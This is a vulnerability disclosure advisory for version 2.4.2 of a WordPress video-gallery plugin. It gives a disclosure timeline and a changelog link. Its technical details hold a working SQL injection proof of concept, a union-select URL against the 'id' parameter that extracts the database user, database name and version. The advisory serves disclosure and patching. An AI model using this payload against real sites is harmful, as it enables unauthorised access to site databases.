Plugin Details
Plugin Name: wp-plugin : hdw-player-video-player-video-gallery
Effected Version : 2.4.2 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
Disclosure Timeline
-
December 25, 2013: Vendor Contacted
- April 22, 2014 : Plugin Updated
- May 28, 2014 : Public Disclosure
Technical Details
<http://localhost/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12>
Vulnerable Parameter : id
Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=900030%40hdw-player-video-player-video-gallery&old=798976%40hdw-player-video-player-video-gallery&sfp_email=&sfph_mail=